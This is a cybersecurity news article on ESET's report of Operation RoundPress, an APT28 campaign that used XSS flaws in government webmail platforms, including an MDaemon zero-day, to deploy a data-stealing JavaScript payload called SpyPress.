APT28 Linked to Russia Exploits MDaemon Zero-Day Vulnerability to Compromise Government Webmail Servers

A threat actor linked to Russia has been identified as the driving force behind a sophisticated cyber espionage operation aimed at webmail servers, specifically targeting platforms such as Roundcube, Horde, MDaemon, and Zimbra through cross-site scripting (XSS) vulnerabilities, including a recently discovered zero-day vulnerability in MDaemon. This operation, dubbed Operation RoundPress, has been documented by ESET, a prominent cybersecurity firm, and has been attributed with moderate confidence to the Russian state-sponsored hacking group known as APT28, which is also recognized by other aliases such as BlueDelta, Fancy Bear, and Sofacy.

The primary objective of Operation RoundPress is to exfiltrate confidential data from targeted email accounts. Matthieu Faou, an ESET researcher, reported that the majority of victims involved in this exercise are governmental entities and defense contractors located in Eastern Europe. However, there have also been reports of targets from Africa, Europe, and South America.

APT28 has a history of exploiting vulnerabilities in webmail applications. For instance, in June 2023, Recorded Future disclosed that this threat actor had leveraged multiple vulnerabilities within Roundcube to facilitate reconnaissance and data gathering operations.

More recently, other adversarial groups, including Winter Vivern and UNC3707 (commonly referred to as GreenCube), have similarly targeted email solutions, including Roundcube, in various campaigns. The association of Operation RoundPress with APT28 stems from shared email addresses utilized for spear-phishing efforts, in addition to indications of similarity in server configurations.

In 2024, the campaign has primarily focused on Ukrainian governmental entities and defense companies located in Bulgaria and Romania, some of which are engaged in the production of Soviet-era weapons destined for Ukraine. Furthermore, the campaign has expanded its reach to include governmental, military, and academic institutions in Greece, Cameroon, Ecuador, Serbia, and Cyprus.

The methodology of these attacks involves exploiting XSS vulnerabilities found in Horde, MDaemon, and Zimbra to execute arbitrary JavaScript code within the context of the webmail interface. Notably, one such vulnerability, identified as CVE-2023-43770, was added to the U.S. Cybersecurity and Infrastructure Security Agency (CISA) “Known Exploited Vulnerabilities” catalog in February 2024.

While the targeted vulnerabilities in Horde, Roundcube, and Zimbra were previously recognized and patched, the XSS vulnerability in MDaemon was exploited as a zero-day, possessing the CVE identifier CVE-2024-11182. This flaw, with a CVSS score of 5.3, was remedied in version 24.5.1 released in November.

The exploitations typically involve sending emails containing malicious code that utilizes XSS flaws to execute JavaScript within the webmail client running in the user’s browser. Successful execution allows the threat actor to read and exfiltrate data from the victim’s account.

For the exploit to succeed, targets must interact with the email message in the vulnerable webmail service, bypassing the email software’s spam filters. The malicious code is embedded within the HTML content of the email body, making it unobtrusive and invisible to the victim.

Upon successful exploitation, a concealed JavaScript payload, referred to as SpyPress, is executed. This malware is capable of stealing webmail credentials and harvesting email messages and contacts from the victim’s mailbox. Although SpyPress does not establish persistence, it reloads upon each opening of the compromised email message.

ESET further identified variants of SpyPress that can create Sieve rules, a feature of Roundcube that automates email handling. Such rules can redirect copies of incoming emails to an attacker-controlled address, ensuring continuous data exfiltration even if the malicious script is not actively running.

Exfiltrated data is typically transmitted to a designated command-and-control (C2) server via HTTP POST requests. Certain SpyPress variants are also capable of capturing login history, two-factor authentication codes, and generating application passwords for MDaemon, thereby enabling sustained access to the mailbox even if the primary password is changed.

Over the past two years, webmail servers like Roundcube and Zimbra have become prime targets for various espionage groups due to their susceptibility to exploitation and the fact that many organizations fail to maintain their webmail infrastructure. Given that vulnerabilities can be triggered remotely through email, attacking these servers for data acquisition presents an appealing opportunity for adversaries.